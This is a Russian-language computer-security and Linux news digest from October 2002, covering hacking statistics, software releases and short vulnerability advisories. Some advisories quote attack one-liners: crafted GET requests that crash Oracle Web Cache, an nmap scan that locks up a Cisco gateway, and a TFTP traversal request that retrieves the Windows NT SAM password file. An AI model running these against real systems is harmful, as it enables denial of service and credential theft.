Компания mi2g, консультирующая банки, страховые компании и фирмы перестрахования, в октябре зафиксировала 16559 сетевых хакерских атак. Специалисты mi2g отмечают, что за этот месяц резко возросло количество атак, совершенных по политическим мотивам. Злоумышленники объединялись в группы, которые атаковали правительственные сайты США, Великобритании, Австралии, Индии и Израиля. По данным сайта zone-H, также отслеживающего хакерскую активность, по политическим причинам были взломаны 11% пострадавших сайтов. Mi2g считает, что на общем фоне выделялись три группировки исламистов: мультинациональная UNIX Security Guards (USG), а также две пакистанские Federal Bureau of Hackers (FBH) и TheBuGz. USG - большая группировка, сформированная в мае этого года. В нее вошли более мелкие команды хакеров из разных стран: из мусульманских республик бывшего СССР, Марокко и Египта. В августе USG осуществила 21 атаку, в сентябре - 207, а в октябре - уже 1511 атак. При этом пострадали сервера виртуального хостинга, обеспечивающие работу нескольких десятков сайтов. Все три группировки оставляли на взломанных сайтах антиамериканские и антианглийские послания, требовали свободы палестинцам и протестовали против войны в Ираке. Источник - http://www.securitylab.ru
29/10/2002 20:58 Reiserfs 4.
Неофициальный релиз 4й версии популярной FS под Linux. На сайте производителя уже доступны исходные коды продукта в виде патча для linux-2.5.44. В данной версии:- улучшения в методике журналирования
- поддержка plugins
- поддержка сжатия
- поддержка шифрования
- online оптимизация расположения файлов и многое другое.
Подробности - http://www.namesys.com/v4/v4.html Download - http://www.namesys.com/snapshots/2002.10.29/
29/10/2002 15:10 "Десятка" уязвимостей Linux/UNIX.
Тот же Джон Маккормик на основании анализа отчёта SANS/FBI составил также "хит-парад" уязвимостей Linux и UNIX-подобных ОС. На первом месте - уязвимость сетевых служб RPC (Remote Procedure Calls). Службы RPC позволяют компьютеру передавать файлы и запускать приложения на удалённой системе. По умолчанию эти службы не ставятся. Для проверки запущенных служб RPC используется команда rpcinfo. На втором месте - уязвимости Вэб-сервера Apache. На третьем - SSH, на четвёртом - SNMP ( cлужба для удалённого управления сетью ). И т.д. Автор замечает, что в отчёте за июнь 2001 г. первое место занимала уязвимость системы доменного разрашения имён BIND (DNS), сейчас же она находится на 9-м месте. Особенно удручает тот факт, что некоторые уязвимости имеют код базы данных CVE (Common Vulnerabilities and Exposures) 1999-xxxx, что говорит о невнимательном отношении многих СИСАДМИНов к обновлению программных компонентов ОС. В ссылке, приведённой ниже, также указан первоисточник, на основании которого делался анализ-отчёт SANS/FBI - своего рода "хит-парад" уязвимостей, периодически выпускаемый тремя организациями: SANS, ФБР и NIPC (National Infrastructure Protection Center). Подобный отчёт выпускается уже третий год и пользуется большой популярностью у системынх администраторов и IT-специалистов. Помимо описания уязвимостей отчёт также включает последовательные инструкции по устранению уязвимостей со ссылками на патчи, сервис-паки. Подробности - http://www.zdnet.com.au/itmanager/trends/story/... Отчёт SANS/FBI - http://www.sans.org/top20/
29/10/2002 14:55 "Десятка" уязвимостей Windows.
На австралийском сайте ZDNET Джон Маккормик (John McCormick) опубликовал "десятку" наиболее часто "используемых" уязвимостей ОС Windows. Отчёт Джона был сделан по результатам анализа недавно опубликованного отчёта SANS/FBI о 20 наиболее часто встречающихся уязвимостях. Как следует из опубликованных данных, уязвимости в Windows разместились в следующей последовательности: 1-IIS. 2-Microsoft Data Access Components (MDAC)-Remote Data Service. 3-Microsoft SQL Server. 4-Незащищённые сетевые NETBIOS ресурсы (shares). 5-Anonymous Logon-Null Sessions. И т.д. Помимо перечисления уязвимостей, автор также приводит рекомендации и ссылки для их устранения. Подробности - http://www.zdnet.com.au/itmanager/trends/...
29/10/2002 14:22 Агентство Reuters обвиняется в хакерстве.
Небольшая шведская фирма Intentia International обратилась к властям королевства с просьбой расследовать факт обнародования агентством Reuters финансового отчета компании до его официальной публикации. Reuters опубликовала отчет Intentia 24 октября, взяв его с веб-сайта компании, однако в компании утверждают, что на момент публикации на сайте не было ни одной ссылки на отчет, и обвиняют информационное агентство в несанкционированном доступе к закрытой информации. Хотя доступ к отчету мог получить любой желающий, набрав в браузере точный адрес, юристы Intentia решили попросить о расследовании, обвинив Reuters в нарушении закона об охране интеллектуальной собственности. Представители информационного агентства назвали подобные обвинения беспочвенными, поскольку публикация материалов, находящихся в интернете в открытом доступе, не является противозаконной. Источник - http://www.ap.org
29/10/2002 14:13 Взломан сайт Blogger.com.
В пятницу сайт Blogger.com, самый известный ресурс для публикации веб-логов, был взломан, в результате чего его работа была прервана на несколько часов. Веб-логи - это ставший популярным в последний год жанр личных веб-сайтов. В России наиболее известен сайт LiveJournal.com, предоставляющий сходные, хотя и несколько отличающиеся услуги. Как заявил президент и исполнительный директор Blogger.com Эван Уильямс, хакеры воспользовались известной дырой в системе безопасности ОС Red Hat Linux для проникновения на сервер. Уильямс утверждает, что взломщикам не удалось получить права администратора на сервере и получить доступ к личной информации пользователей. Однако известно о том, что неизвестный хакер проник в базу данных пользователей и изменил логин и пароль каждого пользователя на строку "hacx0redbyme". Руководство Blogger.com временно прекратило работу сайта, после того как стало извсетно о взломе, и принесло извинения пользователям онлайнового ресурса. Все данные, которые были изменены хакером, восстановлены с резервных копий. Представители сайта до сих пор утверждают, что никаких личных данных хакеру, скорее всего, получить не удалось. Источник - http://www.compulenta.ru
29/10/2002 12:55 Возможность DoS в сервере Oracle9iAS Web Cache.
Oracle9iAS Web Cache является частью сервера приложений Oracle. Предназначен для обеспечения функций кэширования запросов к Oracle Web-серверу и также является обратным прокси-сервером (caching reverse proxy server). Andreas Junestam из @stake, Inc. обнаружил 2 уязвимости, которые могут привести к DoS. Для формирования атаки достаточно соотвествующим образом сформировать HTTP-запросы. 1. Запрос типа HTTP GET, содержащий хотя бы одну последовательность /../ приводит к аварийному завершению сервиса ( GET /../ HTTP/1.0). 2. Также к DoS может привести некорректный GET-запрос (например, GET / HTTP/1.0). Обе уязвимости были обнаружены в версии 9.0.2.0.0. Уязвимости были устранены в версии 9.0.4 Oracle9i Application Server. В бюллетене, выпущенном Oracle также рекомендуются меры по ограничению доступа к серверу Web Cache: ограничение доступа к административным портам сервера при помощи файрволла, ограничение доступа списком IP-адресов и подсетей при помощи свойства Secure Subnets, включённого в состав Web Cache Manager. Подробности - http://www.atstake.com/research/advisories/2002/a102802-1.txt
29/10/2002 12:35 Уязвимость CISCO as5350.
CISCO as5350 - универсальный шлюз, обеспечивающий сетевой доступ. Выпускается фирмой CISCO. Поддерживает линии связи T1, E1. Томас Мунн (Thomas J. Munn) обнаружил, что при формировании 5 посылок сканирования шлюза при помощи сканера nmap (nmap -dinsane -p 1-65535 ip.of.as5350) AS5350 полностью блокируется, и для возобновления его функционирования необходимо полная перезагрузка шлюза. Источник - http://www.securityfocus.com
29/10/2002 12:17 Очередной оброз Preemptible Kernel Patch.
На LinuxJournal.com опубликован обзор популярного патча для Linux ядра. Автор в очередной раз делает акцент на нивелиривании задержек в пространства ядра и демонстрирует преимущества RTOS. Ознакомиться - http://linuxjournal.com/article.php?sid=6405&mode=thread&order=0
29/10/2002 12:03 Уязвимость в MDaemon.
D4rkGr3y из DHGroup обнаружил уязвимость в MDaemon - почтовом сервере для Windows, поддерживающем протоколы SMTP/POP/IMAP с MIME-расширениями. Ошибка скрывается в реализации POP-сервера MDaemon. При посылке в качестве аргумента команд DELE или UIDL 32-байтового (и выше) слова сервер пестаёт отвечать на запросы (DoS). Существует, правда, одно незначительное ограничение. Для выполнения атаки злоумышленник должен иметь (либо получить) почтовый эккаунт на сервере. Выпущен рабочий эксплоит на PERL. Подробности - http://www.dhgroup.org
29/10/2002 11:52 Уязвимость в Macromedia Flash.
В списке рассылки security.nnov.ru сообщается об обнаружении уязвимости в ПО MACROMEDIA: Flash ActiveX 6. Несколько ошибок разбора файла, но несерьезных: ошибки чтения из защищенной области памяти и цикл в котором мгновенно пожирается память. Также обнаружены серьёзные уязвимости, которые могут привести к переполнению буфера с возможностью перезаписи области памяти: 1. Используется zlib v1.1.3 с double free. 2. Ошибка более серьезная: при записи в свойство SWRemote ActiveX компоненты строки с определенным количеством символов (количество символов для разных OS варьируется), например 0xFF, 0xAA, и сброс ее в "" происходит попытка записи по адресу 0x00FF00AA значения 0x00AA00FF. Определенным подбором можно добиться выполнения кода злоумышленником). Кроме того, при проигрывании SWF генерация этой ошибки приводит к записи в другие области памяти (зависит от кода SWF файла). Тестировалось win2000/5.1, win2000/6.0, XP/6.0. К сообщению приложена ссылка на эксплоит. Подробности - http://www.security.nnov.ru/search/document.asp?docid=3690
28/10/2002 15:50 Интеллектуальная маршрутизация поможет покончить с DDoS-атаками.
Хакерские атаки на корневые интернет-серверы, случившиеся на прошлой неделе, высветили проблему атак типа DDoS (распределенных DoS-атак, "отказов в обслуживании") и вновь привлекли внимание к методам борьбы с ними. Одно из возможных решений - спуститься как можно дальше "вниз" с помощью интернет-роутеров, чтобы прервать атаку как можно ближе к ее источнику. Отдельные веб-сайты регулярно подвергаются аналогичным атакам меньшего масштаба, приводящим к нарушению трафика. Распределенность источников атаки делает многие меры противодействия им неэффективными. Программы обеспечения безопасности, способные блокировать трафик, не срабатывают, если он приходит из различных источников. В этом случае программы не могут пресечь атаку без блокирования также и всего нормального трафика. Фил Хаггинс (Phil Huggins), консультант фирмы @Stake, полагает, что лучшим решением может стать пересмотр структуры сети. По его мнению, атаки типа DDoS невозможно прекратить в рамках существующей сетевой инфраструктуры интернета. Эксперт Стив Беллоуин (Steve Bellovin) и его коллеги из AT&T Labs считают, что покончить с атаками удастся, если обратить трафик "вспять", к его источнику. Его группа разрабатывает методику перепрограммирования роутеров, позволяющую им опознавать DDoS-атаки и прекращать их. В нормальном состоянии устройства работают в качестве узловых точек сети, направляющих трафик из одного пункта в другой. Исследователи разработали прототип программного средства, получившего название Pushback. Оно способно распознать необычно высокий трафик и блокировать его, передавая при этом информацию об атаке другим роутерам, которые смогут блокировать атаку как можно ближе к ее источнику. Подробности - http://www.cnews.ru/topnews/2002/10/28/content2.shtml
28/10/2002 15:35 Драма с заложниками: СОРМ в действии.
В конце прошлой недели абоненты трех московских GSM-операторов были встревожены: вчера на дисплеях некоторых моделей телефонов пользователей МТС появились непривычные значки (на аппаратах Siemens "*!*", а на Nokia - разомкнутый "замочек"). Сегодня то же самое происходит и с трубками, подключенными к сети "Би Лайна" и "Мегафона". А дело вот в чем - операторы перешли на упрощенный вариант кодированиея сигнала. Если дисплей вашего мобильника выглядит как обычно, это вовсе не значит, что перемены вас не затронули. Новые для московских абонентов значки на дисплеях мобильников означают, что операторы отключили шифрование разговоров. Причины тут две. Прежде всего - обеспечение Системы Оперативно - разыскных мероприятий (СОРМ). Сотовыми телефонами пользуются террористы, захватившие в Москве зрителей и артистов мюзикла "Норд-Ост", и их возможные сообщники в городе. А это означает, что для спецслужб важно знать содержание этих разговоров и проще всего, не перегружая оборудование для дешифровки, перевести сотовые сети на кодек с упрощенным кодированием сигнала. Эту версию CNews.ru косвенно подтвердили в МТС. "Хотя чрезвычайное положение у нас в стране не объявлено, в связи с последними событиями обстановка в Москве понятно какая, - сказала нам пресс-секретарь МТС Ева Прокофьева. - Сейчас, как никогда, действует закон об оперативно-розыскной деятельности, и операторы оказывают помощь и поддержку компетентным органам". С пресс-службой "Би Лайна" связаться так и не удалось - длительное время не брали трубку. Судьба захваченных людей волнует не только их близких, которые активно звонят им по сотовым телефонам, но и вообще всех жителей столицы, пользующихся в последние дни мобильной связью намного больше обычного. Соответственно, возросла нагрузка на сети операторов. Отключение шифрования также позволяет увеличить число аппаратов, которые одновременно может обслуживать одна базовая станция. Позиция операторов вполне понятна и ее нельзя осуждать. Тем более, что после того, как ситуация вокруг заложников разрешится, мы надеемся, разговоры будут кодироваться как обычно. Источник - http://www.cnews.ru
28/10/2002 15:05 Cписки рассылки Linux Security.
Cайт Linux Security.com объявил о 2 списках рассылки, посвящённых безопасности ОС Linux. Названия списков: Linux Security Newsletter и Security Advisories Weekly. Первый из них посвящён наиболее важным новостям из области безопасности Linux, обновлениям сайта linuxsecurity.com, комментарии новостей от Linux-сообщества. Выпускается раз в неделю утром в понедельник, ведёт рассылку Guardian Digital. Второй список рассылки посвящён вышедшим за неделю бюллетеням по безопасности производителей различных дистрибутивов Linux, содержит список обновлённых программ и пакетов, а также подробное описание обнаруженных уязвимостей. Подробности - http://www.linuxsecurity.org/articles/forums_article-5842.html
28/10/2002 14:49 Служба электронных открыток принуждает пользователей расcылать спам.
Антивирусная компания Sophos сообщает о появлении нового метода рассылки спама. Спамерами стали ничего не подозревающие пользователи сайта FriendGreetings.com. В Sophos сообщают о многочисленных жалобах от пользователей, которые получили по почте предложение посмотреть отправленную им картинку. Ссылка в сообщении вела на страницу сайта FriendGreetings, однако перед просмотром открытки, пользователю предлагалось установить в систему ActiveX-компонент, к которому прилагалось пользовательское соглашение. В соглашении говорилось о том, что специальное программное обеспечение "получит доступ к адресной книге Microsoft Outlook и разошлет контактам сообщение с рекламой FindGreetings или других компаний". И если пользователь не желает производить рассылку, то он не может пользоваться FindGreetings. Скорее всего, мало кто пострадает от того, что не сможет воспользоваться сомнительным бесплатным сервисом. Проблема заключается в том, что большинство пользователей не обращают внимания на лицензионные соглашения и, таким образом, могут, не подозревая об этом, стать спамерами. Действия компании Permissioned Media, которой принадлежит FindGreetings, нельзя назвать противозаконными (из-за лицензионного соглашения), а программный код нельзя назвать вирусом, так как он, опять-таки, устанавливается с разрешения пользователя. Компания Sophos рекомендует заблокировать доступ к сайту FindGreetings тем компаниям, которые пекутся о безопасности своих компьютерных систем. Источник - http://www.compulenta.ru
28/10/2002 13:45 Войны ОС: BSD против LINUX.
Jay Lyman из NewsFactor Network рассуждает о том, какая ОС (на его взгляд) победила в необъявленной войне BSD против Linux. Вот одна из цитат: ""The difference I see between BSD and Linux is that Linux has fanfare and BSD is quiet. The popularity [of Linux] is increasing. I don't see that changing, and I don't see BSD changing. BSD will probably be there in the back room chugging along, mostly with e-mail and Web servers." Подробности - http://www.newsfactor.com/perl/story/19558.html
28/10/2002 11:05 Описание формата выполнимого файла ELF.
Sandeep S. в рамках статьи "Process Tracing Using Ptrace" (Трассировка пакетов при помощи утилиты ptrace) подробно описывает устройство формата выполнимых файлов ELF (Executable and Linking Format). Описываются поля ELF-заголовка, процесс загрузки программы в память, компоновка сегментов и секций в ELF-файле. Рекомендуется для ознакомления программистам Linux. Cтатья - http://www.linuxgazette.com/issue83/sandeep.html
27/10/2002 12:50 Виртуализация сетевого стека в FreeBSD.
Marko Zec выпустил "Network Stack Virtualization" патч для FreeBSD-4.7. Патч позволяет создать на одной машине несколько полностью виртуальных, изолированных, клонов tcp/ip стека, что идеально подходит для решений виртуального хостинга в комплекте с chroot jail. Введены в систему два новых вида интерфейса "ve" - виртуальный ethernet и "vipa" - виртуальный loopback, что позволяет создавать для каждого виртуального сетевого стека независимый и разделенный набор сетевых интерфейсов, таблиц маршрутизации, net.inet sysctl переменных ядра, ipfw правил фаервола и правил ограничений трафика для dummynet. Самым интересным свойством патча, на мой взгляд, является возможность планировки и учета процессорного времени (system load and CPU usage accounting and scheduling). Новость взята с www.opennet.ru Подробности - http://www.tel.fer.hr/zec/BSD/vimage/
27/10/2002 12:35 Основатель Lotus готовит альтернативу Outlook.
Мич Капор (Mitch Kapor), соучредитель Lotus Development и пионер программного обеспечения для персональных компьютеров, возглавил проект по созданию бесплатного эквивалента Microsoft Outlook с открытым исходным кодом — набора программ электронной почты, календаря и управления контактами. «Менеджер персональной информации» будет иметь большинство тех же функций, что и у Microsoft Outlook, с акцентом на инструменты, которые позволят коллективно работать в группах и обмениваться данными, пояснил Капор, который финансирует проект в объеме 5 млн $ из собственного кармана. Программа будет содержать систему немедленного обмена сообщениями open-source Jabber, а также простую в применении систему шифрования e-mail, которую разрабатывает организация Капора. Первая версия, которая будет работать на системах Windows, Mac OS X и Linux, появится в конце года, а окончательный релиз выйдет ближе к концу будущего года, обещает Капор. Программа предназначена для индивидуальных пользователей и малых предприятий, которые не в состоянии осилить лицензионную плату и расходы по техническому обслуживанию сложных продуктов типа Microsoft Exchange. Подробности - http://zdnet.ru/?ID=290224
27/10/2002 12:25 Cтатья "Внутреннее устройство Ядра Linux 2.4".
Андрей Киселёв представил сетевому Linux-сообществу перевод статьи Тиграна Айвазяна, в которой описывается внутреннее устройство ядра Linux. Автор, работающий старшим инженером в VERITAS Software Ltd., написал этот документ в рамках небольшого учебного курса лекций, который он читает внутри VERITAS и предложил его в качестве документа для проекта LDP (Linux Documentation Project). В статье, в частности, описываются: процесс сборки ядра, этапы загрузки ядра, использование LILO в качестве загрузчика, управление процессами и прерываниями, виртуальная файловая система (VFS), работа механизма кэширования в Linux, механизм IPC (InterProcess Communication). Перевод - http://linux.perm.ru/doc/linux/lki/lki.html
27/10/2002 12:10 Статья "Управление доступом к сервисам при помощи xinetd".
Эта статья представляет собой обучающий материал, раскрывающий особенности, возможности конфигурирования доступа и обслуживания системы при помощи супердемона xinetd. Супердемоном в среде Linux называют службу (сервис) при помощи которого осуществляется управление другими сетевыми службами. Ранее (в ядрах до 2.4) управление сетевыми службами осуществлял супердемон inetd. Однако этот супердемон пользволял только включать.отключать различные сетевые службы и определять методы их запуска. Вся дальнейшая работа по ограничению допуска к сетевым службам строилась на связке tcpwrapper (файлы hosts.allow/host.deny) c сетевыми фильтрами (ipchains/iptables). Xinetd создавался с учётом всех вышеприведённых факторов - в нём есть возможность конфигурирования доступа к сетевым службам, ограничение траффика, поступающего к службе и прочие возможности гибкой настройке. Процессу установки, настройки и конфигурирования супердемона xinetd посвящена статья Dee-Ann LeBlanc "Controlling Access to Your Services with xinetd". Скорее всего, она вряд ли будет представлять интерес для опытных СИСАДМИНа, но будет представлять несомненный интерес для новичков. Статья - http://linuxplanet.com/linuxplanet/tutorials/4505/1/
27/10/2002 11:35 Дополнение к уязвимости в Kerberos.
В дополнение к уязвимости в реализации Kerberos от MIT, объявлено о наличие такой же уязвимости в реализации Kerberos от KTH (Kungl Tekniska Hцgskolan). В KTH Kerberos 5 (Heimdal) также присутствует уязвимость в административном демоне kadmind4, предназначенном для совместимости с предыдущей версией Kerberos - Kerberos 4 (eBones). Напомним, что назначение сетевого протокола Kerberos - использованией сильного алгоритма шифрации при аутентификации между клиентом и сервером. Административный демон Kerberos (kadmind) управляет процедурой изменения паролей и прочими процедурами для изменения базы данных Kerberos. Kadmind запускается на мастер-сервере Key Distribution Center (KDC) окружения Kerberos. Уязвимость заключается в неверном разборе содержимого сетевых запросов. В дальнейшем разбираемые данные используются в качестве аргумента системного вызова memcpy(), в котором из-за неверного разбора данных может произойти переполнение буфера, размещённого в стеке. Выпущены патчи, а также выпущен документ, в котором указываются сигнатуры атаки на демон Kerberos. Подробности - http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2002-002-kadm4.txt Описание сигнатур атаки - http://web.mit.edu/kerberos/www/advisories/2002-002-kadm4_attacksig.txt
26/10/2002 20:40 IBM снова выбирает Linux.
Очередной знак внимания к Linux со стороны компании IBM. На этот раз компания решила избрать Linux как базовую OS для новой линейки суперкомпьютеров "Blue Gene". Источник - http://lwn.net/
26/10/2002 20:34 Релиз 2.6 намечен на июнь.
Не так давно, в рассылке разработчиков ядра OS Linux (lkml), прошли слухи на счет ожидаемой даты выхода следующей версии стабильного ядра Linux. На тот момент предполагали, что 2.6 (3.0) выйдет в начале 2004-ого года, однако, по сообщениям news.com.com, Linus Torvalds назвал иную дату : июнь 2003. Подробности - http://news.com.com/2100-1001-963447.html
26/10/2002 19:33 Возможность подмены подписанного документа в ECDSA.
А.В. Комлин обнаружил серьёзную ошибку в математическом аппарате новейшего американского стандарта ЭЦП известного как ECDSA (DSA для эллиптических кривых). Ошибка позволяет выбрать такое значение секретного ключа, при котором можно получить одинаковые подписи для разных документов. Это позволяет мошеннику отказаться от подписанных документов. Описанная ошибка отличается от уже известных и сходных по смыслу DSKS (Duplicate Signature Key Selection), тем, что не требует участия злоумышленника в выборе параметров подписи (G,q и т.д.). Таким образом она доступна практически любому пользователю ЭЦП. Подробное описание и обсуждение ошибки, контрольный пример исходники эксплойта лежат по приведённому ниже адресу. Подробности - http://bugtraq.ru/cgi-bin/forum.cgi?type=sb&b=15&m=62248
26/10/2002 19:23 DoS в IBM Infoprint.
Тони Лассила обнаружил возможность выведения из строя сетевых принтеров, выпускаемых фирмой IBM. При проверке тестировалась модель IBM Infoprint 21. Эти сетевые принтеры выпускаются с возможностью удалённого управления посредством протокола Telnet (порт 23/tcp). Фирменный софт, с которым поставляются подобные принтеры некорректно обрабатывает входные данные, вводимые пользователем. В частности, было замечено, что после соединения по telnet и вводе в поле имени пользователя большого количества символов, принтер переставал обрабатывать дальнейшие запросы. При тестировании автор вводил большое количество букв "к", при этом сетевой интерфейс полностью "ложился", принтер переставал отвечать на запросы, а панель физического управления на принтере не отвечала. Для восстановления функциональности требовалась физическая перезагрузка принтера. Источник - http://online.securityfocus.com
26/10/2002 19:18 Уязвимость Linksys WET11.
Обнаружена уязвимость в Linksys WET11, который является мостом между Ethernet-сетью и беспроводной сетью 802.11b. Представляет собой небольшую коробочку размером с выпускавшийся в 1991 г. Walkman с отсоединяемой SMC-антенной. Имеет Вэб-ориентированный интерфейс настройки, цена прибора около 100$. Обнаружено, что при приёме пакета, содержащего в DLC-заголовке MAC - адрес (физический адрес сетевой карты), равный MAC-адресу моста Linksys WET11, мост полностью перестаёт функционировать. Одинаковый эффект наблюдается как при посылке прямого (direct) пакета, так и при посылке широковещательного (broadcast). ПРи тестировании использовался протокол UDP. Подробности - http://www.enZotech.net/advisories/linksys.wet11.txt
26/10/2002 18:56 Статья "Fabulous Fonts in Linux".
В статье Томаса Грина (Thomas C. Greene) рассказывается о том, как установить, настроить и работать с TrueType шрифтами Microsoft в среде KDE. Cтатья - http://www.theregus.com/content/4/26770.htm
26/10/2002 18:35 Выход XandrOS 1.0.
Вышел первый рели наследника Corel Linux - XandrOS. Пока доступна только версия для десктопов, серверная версия ожидается в ближайшем будущем. Серверный вариант ОС будет иметь "простой, удобный в использовании для пользователя" инструмент удаленного управления под названием DaVinci. Как и множество дистрибутивов, весь труд конфигураторов десктопа переложен на плечи КДЕ. КДЕ-единственный оконный менеджер в дистрибутиве. Кроме того, в дистрибутиве содержится мастер установки принтеров (сетевых тоже), автоматическая настройка сети (и NetBIOS-сети), поддержка винмодемов и автоматическое определение USB устройств "на лету". Можно также заметить ХП-кнопочки, которые сейчас очень популярны. Инсталятор очень простой и имеет всего 5 шагов. Как утверждает разработчик, этим инсталятором можно смело изменять размеры NTFS. Разработчики утверждают что именно в их дистрибутиве программы под Windows работают лучше, чем у конкурентов. Используется Codeweavers CrossOver Office и Plugin без поддержки разработчиков. С помощью мастера все данные экспортруются из Windows "на лету". Хотя, ничего существенно нового в плане поддержки Win-прложений не замечено. До сих пор подерживается только IE5.5 и его друг OE. По некоторым отзывам в IE не работают закладки и открытие страниц с диска. В дистрибутиве так-же существует служба, аналогичная Windows Update (наз. Web Update) Основные элементы: Mozilla 1.1, KDE2 (из коробки) и 3 (на втором эксперементальном диске Technology Preview), OpenOffice 1.01. Цена дистрибутива и 250 страниц документации - 99$ + доставка за пределы США. Замечание: приведены личные впечатления anonymous с сайта linux.org.ru. Источник - http://www.xandros.com/
26/10/2002 17:58 УВД Калининградской области задержан хакер.
В понедельник сотрудники отдела по борьбе с киберпреступностью /отдела "К"/ УВД Калининградской области задержали 18-летнего хакера. Как сообщил пресс-секретарь начальника УВД Максим Макаров, талантливый компьютерщик из города Гвардейск Калининградской области пытался модифицировать компьютерную информацию в сети калининградского филиала банк "Менатеп СПб". Источник - http://www.bugtraq.ru
25/10/2002 22:12 Microsoft выпустила заплатку для Windows XP.
Корпорация Microsoft, все-таки, решила выпустить самостоятельную заплатку для опасной дыры, содержащейся в модуле Help and Support Center ОС Windows XP. Ранее единственным способом ликвидации этой дыры была установка пакета исправлений Service Pack 1, причем Microsoft утверждала, что не собирается выпускать отдельный патч. Такое решение не понравилось многим пользователям, поскольку Service Pack 1 имеет объем около 30 Мб и загрузить его через аналоговый модем оказалось весьма непросто. Теперь софтверный гигант изменил свое мнение. В сообщении на сайте компании говорится, что на основании анализа отзывов пользователей в компании приняли решение предоставить более полную информацию об уязвимости и выпустить для нее заплатку. Вместе с тем, в Microsoft подчеркивают, что установка сервис-паков более предпочтительна, чем установка одиночных заплаток. Объясняется это тем, что пакеты обновлений обычно тщательнее тестируются и исправляют большее число ошибок. Модуль Help and Support Center служит для отправки на сайт Microsoft информации о новом железе, устанавливающемся в компьютеры с Windows XP. Уязвимость в этом модуле сводится к тому, что доступ к файлам на диске компьютера может получить не только система, но и злоумышленник с помощью особым образом скомпонованного HTML-документа. Его можно разместить на веб-сайте или прислать по электронной почте. При этом воспользоваться уязвимостью посредством письма нельзя, если на компьютере установлен пакет Outlook 2002, Outlook Express 6 или их более ранние версии с патчем Outlook Email Security Update. Информация об уязвимости содержится в бюллетене Microsoft MS02-060. Скачать патч отсюда - http://www.microsoft.com/Downloads/Release.asp?ReleaseID=43681
25/10/2002 16:03 Уязвимости во многих Web-серверах для Windows.
Тамер Сахин сообщает об уязвимостях, обнаруженных SecurityOffice в Web-серверах, предназначенных для ОС Windows. Перечень серверов, в которых обнаружены уязвимости: BadBlue, Liteserve (помимо Вэб-сервера, является ещё и почтовым и FTP-сервером), BRS WebWeaver. В первом и третьем Вэб-серверах обнаружена возможность доступа к защищённым локальным файлам, во втором - возможность обхода авторизации. Обнаруженные уязвимости присутствуют в версиях продуктов для ОС Win2K SP3, Win98SE. Подробности - http://www.securityoffice.net/articles/
25/10/2002 15:36 Статья "Создание графики на лету с использованием GD".
Вашему вниманию предлагается ещё одна статья по использованию языка Perl. Полное название её "Исследование Perl модулей, часть 1. Создание графики на лету с использованием GD". Cтатья посвящена основам использования модуля графической библиотеки GD в программах, написанных на Perl. Подробно разбирается процесс рисования прямоугольника при помощи GD, затем простейшего графического примитива, после чего рассматривается работа со шрифтами. В конце статьи приводится пример скрипта для создания небольшого онлайнового фотоальбома и графического счётчика. Автор статьи - Pradeep Padala, перевод - Алексей Чегляков. Спасибо ach ака info@providerz.ru за присланную ссылку. Статья - http://providerz.ru/articles/perl/perl-using-gd-padala.html
25/10/2002 15:27 Уязвимости в TFTP-сервере.
Группы DHG и iDEFENSE независимо друг от друга обнаружили уязвимости в TFTP (Trivial FTP) - сервере, выпускаемом компанией SolarWinds. TFTP-протокол используется для сетевой загрузки операционной системы или файлов сетевой конфигурации для таких устройств, как: роутеры, концентраторы, X-терминалы, принтеры, терминальные серверы. Передача сервером информации основана на протоколе UDP (в отличие от TCP в случае FTP). Протокол описан в RFC1350. Обмен UDP-дейтаграммами ведётся по порту 69. Группа DHG (Damage Hackers Group) из России в лице D4rkGr3y оповестила BUGTRAQ о том, что сервер TFTP можно свалить, послав UDP-дейтаграмму длиной более 8193 байт (порт 69). Выпущен эксплоит на Perl. Вторая уязвимость, обнаруженная группой iDEFENSE заключается в возможности получения любого файла системы, на которой запущен TFTP-сервер. Таким образом, послав запрос вида: tftp target.server GET a\..\..\winnt\repair\sam, можно получить базу данных паролей WindowsNT. Для устранения уязвимостей SolarWinds выпущена версия 5.0.60 TFTP-сервера. Первая уязвимость - http://www.dhgroup.org Вторая уязвимость - http://www.idefense.com/advisory/10.24.02.txt
25/10/2002 14:20 Cтатья "mod_perl за 30 минут".
Вашему вниманию предлагается статья "mod_perl за 30 минут" Стаса Бэкмена в переводе Инги Захаровой. Посвящена процессу установки модуля mod_perl в Вэб-сервере Apache, а также настройке самого Апача для работы с mod_perl. Может представлять интерес для начинающих СИСАДМИНов, занимающихся настройкой и поддержанием работоспособности Apache. Cтатья - http://providerz.ru/articles/perl/mod_perl_in_30_minutes_1.html
25/10/2002 13:50 ФБР ищет организаторов атаки на корневые DNS-серверы.
ФБР начало поиск организаторов крупнейшей за всю историю интернета атаки на корневые DNS-серверы. В администрации президента США заявили, что пока неизвестно, откуда проводилась атака, кто может быть ответственен за инцидент, и можно ли считать атаку на DNS-серверы кибертерроризмом. Национальный центр ФБР по защите инфраструктуры и агенты из подразделения Бюро по киберпреступлениям в настоящее время ведут расследование причин атаки. Судя по заявлениям технических экспертов, привлеченных к расследованию, ФБР в настоящее время пересматривает лог-файлы DNS-серверов, пытаясь определить источник атаки. Представитель американского департамента Национальной безопасности Гордон Джондроу посчитал некорректными заявления экспертов о том, что атака на корневые DNS-серверы была самой совершенной и крупномасштабной в истории интернета. Он заявил, что атакующие не использовали каких-либо специальных методик. "В результате атаки в трафике Сети возникли временные затруднения, но крупных сбоев не было", - заявил Джондроу. С мнением Джондроу согласен Марк Цвиллингер, бывший сотрудник министерства юстиции США, расследовавший причины аналогичной серии атак на сайты поставщиков услуг электронной коммерции в 2000 году. По мнению Цвиллингера, атака на DNS-серверы не принесла ощутимого вреда, но "продемонстрировала возможность нанесения серьезного ущерба в будущем". Последствия атаки, проведенной в понедельник, не были столь серьезными еще и потому, что многие компании и организации "кэшируют" интернет-адреса, по которым располагаются популярные домены, для большей скорости соединения. Теоретически интернет может сохранять работоспособность и с одним-единственным работающим корневым DNS-сервером, однако функциональность Сети окажется крайне невысока, если хотя бы четыре сервера прекратят работу на длительный срок. Источник - http://www.compulenta.ru
25/10/2002 13:45 Lindows 3.0 выйдет в середине ноября.
Компания Lindows.com обявила о своих планах выпустить в середине ноября LindowsOS 3.0 Membership Edition. Как сообщается, дистрибутив будет включать 2 CD и цветное руководство QuickStart, которое предназначено для помощи при установки ОС. Новой осбенностью новой версии Lindows является идущий на втором CD пакет Click-N-Run Express, прдназначенного для максимально облегчённой и прозрачной для пользователя установки ПО с сервера Click-N-Run Warehouse. Базовая стоимость нового релиза объявлена 129$. Подробности - http://www.desktoplinux.com/news/NS7240415898.html
25/10/2002 12:25 Расширение полномочий в Norton Antivirus Corporate Edition.
